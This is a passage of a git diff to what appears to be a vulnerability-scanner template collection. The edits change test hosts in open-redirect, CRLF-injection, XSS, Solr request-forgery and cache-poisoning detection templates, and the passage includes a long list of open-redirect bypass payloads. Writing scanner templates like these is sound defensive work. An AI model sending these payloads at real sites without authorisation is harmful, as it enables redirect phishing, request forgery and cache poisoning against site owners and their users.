" part: body diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index e40368cb13..31f45a6ce6 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -22,10 +22,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com" + - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index 03abba0392..353e46f133 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml @@ -18,10 +18,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" + - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml index b495d73948..b14b8c85ef 100644 --- a/cves/2021/CVE-2021-24358.yaml +++ b/cves/2021/CVE-2021-24358.yaml @@ -23,7 +23,7 @@ requests: Host: {{Hostname}} - | - GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1 + GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1 Host: {{Hostname}} redirects: true @@ -31,7 +31,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 extractors: - type: regex diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml index 3eab806058..e9962f0eb1 100644 --- a/cves/2021/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/" + - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-24838.yaml b/cves/2021/CVE-2021-24838.yaml index 4507004f34..d5a8994f81 100644 --- a/cves/2021/CVE-2021-24838.yaml +++ b/cves/2021/CVE-2021-24838.yaml @@ -19,14 +19,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" + - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh" matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/cves/2021/CVE-2021-25028.yaml b/cves/2021/CVE-2021-25028.yaml index 95166d2193..276b76a71b 100644 --- a/cves/2021/CVE-2021-25028.yaml +++ b/cves/2021/CVE-2021-25028.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com" + - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml index eb2253c0ed..83c815b2b8 100644 --- a/cves/2021/CVE-2021-25033.yaml +++ b/cves/2021/CVE-2021-25033.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com" + - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-25074.yaml b/cves/2021/CVE-2021-25074.yaml index 4d0bc14d27..3ae03aa67d 100644 --- a/cves/2021/CVE-2021-25074.yaml +++ b/cves/2021/CVE-2021-25074.yaml @@ -18,12 +18,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com" + - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/21 diff --git a/cves/2021/CVE-2021-25111.yaml b/cves/2021/CVE-2021-25111.yaml index 7c8f439e97..506e3d7994 100644 --- a/cves/2021/CVE-2021-25111.yaml +++ b/cves/2021/CVE-2021-25111.yaml @@ -17,10 +17,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com" + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 7f46e618ad..639239fcce 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" + - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0" matchers-condition: and matchers: @@ -32,7 +32,7 @@ requests: words: - "Content-Disposition: attachment;filename=test.txt" - "Set-Cookie:CRLFInjection=Test" - - "Location: example.com" + - "Location: interact.sh" - "X-XSS-Protection:0" part: header condition: and diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index 1fb8c47b82..f854a1c72a 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -27,7 +27,7 @@ requests: Connection: close - | - GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1 + GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index 9ce1f43762..144d5434a0 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml @@ -19,10 +19,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/new/newhttp://example.com" + - "{{BaseURL}}/new/newhttp://interact.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-32618.yaml b/cves/2021/CVE-2021-32618.yaml index 87f4c0da7f..9516d961a3 100644 --- a/cves/2021/CVE-2021-32618.yaml +++ b/cves/2021/CVE-2021-32618.yaml @@ -6,7 +6,7 @@ info: severity: medium description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com - will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. + will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh. reference: - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/issues/486 @@ -21,10 +21,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login?next=\\\example.com' + - '{{BaseURL}}/login?next=\\\interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index bceb482946..5f9932809c 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -20,7 +20,7 @@ info: requests: - raw: - |+ - GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 + GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 Host: {{Hostname}} Connection: close @@ -34,6 +34,6 @@ requests: - type: word words: - - "com\"/onmouseover=\"alert(1)\">" + - "sh\"/onmouseover=\"alert(1)\">" # Enhanced by mp on 2022/04/21 diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index e5f0e1ba3d..b315539242 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 1cf1c27f69..7e6130d9e5 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -34,11 +34,11 @@ requests: -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_email" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password_present" @@ -46,11 +46,11 @@ requests: -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_first_name" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_last_name" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="_wp_http_referer" @@ -89,7 +89,7 @@ requests: Origin: {{BaseURL}} Referer: {{BaseURL}} - log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In + log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In - | GET /wp-admin/ HTTP/1.1 diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml index 50332c40c1..8d04d97361 100644 --- a/cves/2021/CVE-2021-3654.yaml +++ b/cves/2021/CVE-2021-3654.yaml @@ -21,13 +21,13 @@ requests: - method: GET path: - - '{{BaseURL}}//example.com/%2f..' + - '{{BaseURL}}//interact.sh/%2f..' matchers-condition: and matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - type: status diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml index 4708455ae9..748fc229c4 100644 --- a/cves/2021/CVE-2021-39501.yaml +++ b/cves/2021/CVE-2021-39501.yaml @@ -20,12 +20,12 @@ requests: - method: GET path: - - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' + - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' # Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml index 4e82f41a4d..4ab7d97069 100644 --- a/cves/2021/CVE-2021-41826.yaml +++ b/cves/2021/CVE-2021-41826.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/auth/logout?continue=//example.com" + - "{{BaseURL}}/auth/logout?continue=//interact.sh" matchers-condition: and matchers: @@ -33,6 +33,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' # Enhanced by mp on 2022/02/27 diff --git a/cves/2021/CVE-2021-44528.yaml b/cves/2021/CVE-2021-44528.yaml index 266195bfe7..f2bb4ca0e0 100644 --- a/cves/2021/CVE-2021-44528.yaml +++ b/cves/2021/CVE-2021-44528.yaml @@ -21,14 +21,14 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Forwarded-Host: //example.com + X-Forwarded-Host: //interact.sh matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - type: status status: diff --git a/cves/2021/CVE-2021-45092.yaml b/cves/2021/CVE-2021-45092.yaml index 60a13263b4..66949d3421 100644 --- a/cves/2021/CVE-2021-45092.yaml +++ b/cves/2021/CVE-2021-45092.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/lab.html?vpath=//example.com" + - "{{BaseURL}}/lab.html?vpath=//interact.sh" matchers: - type: regex diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml index d27fe97f68..a64ce02434 100644 --- a/cves/2021/CVE-2021-46379.yaml +++ b/cves/2021/CVE-2021-46379.yaml @@ -22,10 +22,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' + - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2022/CVE-2022-0165.yaml b/cves/2022/CVE-2022-0165.yaml index 6819d8dae4..fedf338005 100644 --- a/cves/2022/CVE-2022-0165.yaml +++ b/cves/2022/CVE-2022-0165.yaml @@ -17,10 +17,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com" + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' \ No newline at end of file diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml index 47e1e5d356..15717f78c2 100644 --- a/cves/2022/CVE-2022-0692.yaml +++ b/cves/2022/CVE-2022-0692.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.php/example.com' + - '{{BaseURL}}/index.php/interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/03/08 diff --git a/misconfiguration/caddy-open-redirect.yaml b/misconfiguration/caddy-open-redirect.yaml index 4e43996064..40f51f9b7c 100644 --- a/misconfiguration/caddy-open-redirect.yaml +++ b/misconfiguration/caddy-open-redirect.yaml @@ -11,10 +11,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}//example.com/%2F..' + - '{{BaseURL}}//interact.sh/%2F..' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/token-spray/api-debounce.yaml b/token-spray/api-debounce.yaml index 2ed95d091b..2c1aef9552 100644 --- a/token-spray/api-debounce.yaml +++ b/token-spray/api-debounce.yaml @@ -13,7 +13,7 @@ self-contained: true requests: - method: GET path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" matchers: - type: word diff --git a/token-spray/api-fullhunt.yaml b/token-spray/api-fullhunt.yaml index dd160e504b..f69fd590db 100644 --- a/token-spray/api-fullhunt.yaml +++ b/token-spray/api-fullhunt.yaml @@ -15,7 +15,7 @@ self-contained: true requests: - method: GET path: - - https://fullhunt.io/api/v1/domain/example.com/details + - https://fullhunt.io/api/v1/domain/interact.sh/details headers: X-API-Key: "{{token}}" diff --git a/token-spray/api-sslmate.yaml b/token-spray/api-sslmate.yaml index 940d325e12..4454c7c339 100644 --- a/token-spray/api-sslmate.yaml +++ b/token-spray/api-sslmate.yaml @@ -14,7 +14,7 @@ self-contained: true requests: - method: GET path: - - https://sslmate.com/api/v2/certs/example.com?expand=current.crt + - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt headers: Authorization: Bearer {{token}} diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index 1703f38d93..88f4e1af9f 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -13,9 +13,9 @@ requests: - raw: - | GET /?{{randstr}}=9 HTTP/1.1 - X-Forwarded-Prefix: prefix.cache.example.com - X-Forwarded-Host: host.cache.example.com - X-Forwarded-For: for.cache.example.com + X-Forwarded-Prefix: prefix.cache.interact.sh + X-Forwarded-Host: host.cache.interact.sh + X-Forwarded-For: for.cache.interact.sh - | GET /?{{randstr}}=9 HTTP/1.1 @@ -24,10 +24,10 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "cache.example.com")' + - 'contains(body_2, "cache.interact.sh")' extractors: - type: regex part: response regex: - - "(prefix|host|for).cache.example.com" + - "(prefix|host|for).cache.interact.sh" diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 2598c937eb..7e6cd07c7e 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -15,94 +15,94 @@ requests: payloads: redirect: - - '%0a/example.com/' - - '%0d/example.com/' - - '%00/example.com/' - - '%09/example.com/' - - '%5C%5Cexample.com/%252e%252e%252f' - - '%5Cexample.com' - - '%5cexample.com/%2f%2e%2e' - - '%5c{{RootURL}}example.com/%2f%2e%2e' - - '../example.com' - - '.example.com' - - '/%5cexample.com' - - '////\;@example.com' - - '////example.com' - - '///example.com' - - '///example.com/%2f%2e%2e' - - '///example.com@//' - - '///{{RootURL}}example.com/%2f%2e%2e' - - '//;@example.com' - - '//\/example.com/' - - '//\@example.com' - - '//\example.com' - - '//\texample.com/' - - '//example.com/%2F..' - - '//example.com//' - - '//example.com@//' - - '//example.com\texample.com/' - - '//https://example.com@//' - - '/<>//example.com' - - '/\/\/example.com/' - - '/\/example.com' - - '/\example.com' - - '/example.com' - - '/example.com/%2F..' - - '/example.com/' - - '/example.com/..;/css' - - '/https:example.com' - - '/{{RootURL}}example.com/' - - '/〱example.com' - - '/〵example.com' - - '/ゝexample.com' - - '/ーexample.com' - - '/ーexample.com' - - '<>//example.com' - - '@example.com' - - '@https://example.com' - - '\/\/example.com/' - - 'example%E3%80%82com' - - 'example.com' - - 'example.com/' - - 'example.com//' - - 'example.com;@' - - 'https%3a%2f%2fexample.com%2f' - - 'https:%0a%0dexample.com' - - 'https://%0a%0dexample.com' - - 'https://%09/example.com' - - 'https://%2f%2f.example.com/' - - 'https://%3F.example.com/' - - 'https://%5c%5c.example.com/' - - 'https://%5cexample.com@' - - 'https://%23.example.com/' - - 'https://.example.com' - - 'https://////example.com' - - 'https:///example.com' - - 'https:///example.com/%2e%2e' - - 'https:///example.com/%2f%2e%2e' - - 'https:///example.com@example.com/%2e%2e' - - 'https:///example.com@example.com/%2f%2e%2e' - - 'https://:80#@example.com/' - - 'https://:80?@example.com/' - - 'https://:@\@example.com' - - 'https://:@example.com\@example.com' - - 'https://:@example.com\@WillBeReplaced.com' - - 'https://;@example.com' - - 'https://\texample.com/' - - 'https://example.com/example.com' - - 'https://example.com/https://example.com/' - - 'https://www.\.example.com' - - 'https:/\/\example.com' - - 'https:/\example.com' - - 'https:/example.com' - - 'https:example.com' - - '{{RootURL}}example.com' - - '〱example.com' - - '〵example.com' - - 'ゝexample.com' - - 'ーexample.com' - - 'ーexample.com' - - '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' + - '%0a/interact.sh/' + - '%0d/interact.sh/' + - '%00/interact.sh/' + - '%09/interact.sh/' + - '%5C%5Cinteract.sh/%252e%252e%252f' + - '%5Cinteract.sh' + - '%5cinteract.sh/%2f%2e%2e' + - '%5c{{RootURL}}interact.sh/%2f%2e%2e' + - '../interact.sh' + - '.interact.sh' + - '/%5cinteract.sh' + - '////\;@interact.sh' + - '////interact.sh' + - '///interact.sh' + - '///interact.sh/%2f%2e%2e' + - '///interact.sh@//' + - '///{{RootURL}}interact.sh/%2f%2e%2e' + - '//;@interact.sh' + - '//\/interact.sh/' + - '//\@interact.sh' + - '//\interact.sh' + - '//\tinteract.sh/' + - '//interact.sh/%2F..' + - '//interact.sh//' + - '//interact.sh@//' + - '//interact.sh\tinteract.sh/' + - '//https://interact.sh@//' + - '/<>//interact.sh' + - '/\/\/interact.sh/' + - '/\/interact.sh' + - '/\interact.sh' + - '/interact.sh' + - '/interact.sh/%2F..' + - '/interact.sh/' + - '/interact.sh/..;/css' + - '/https:interact.sh' + - '/{{RootURL}}interact.sh/' + - '/〱interact.sh' + - '/〵interact.sh' + - '/ゝinteract.sh' + - '/ーinteract.sh' + - '/ーinteract.sh' + - '<>//interact.sh' + - '@interact.sh' + - '@https://interact.sh' + - '\/\/interact.sh/' + - 'interact%E3%80%82sh' + - 'interact.sh' + - 'interact.sh/' + - 'interact.sh//' + - 'interact.sh;@' + - 'https%3a%2f%2finteract.sh%2f' + - 'https:%0a%0dinteract.sh' + - 'https://%0a%0dinteract.sh' + - 'https://%09/interact.sh' + - 'https://%2f%2f.interact.sh/' + - 'https://%3F.interact.sh/' + - 'https://%5c%5c.interact.sh/' + - 'https://%5cinteract.sh@' + - 'https://%23.interact.sh/' + - 'https://.interact.sh' + - 'https://////interact.sh' + - 'https:///interact.sh' + - 'https:///interact.sh/%2e%2e' + - 'https:///interact.sh/%2f%2e%2e' + - 'https:///interact.sh@interact.sh/%2e%2e' + - 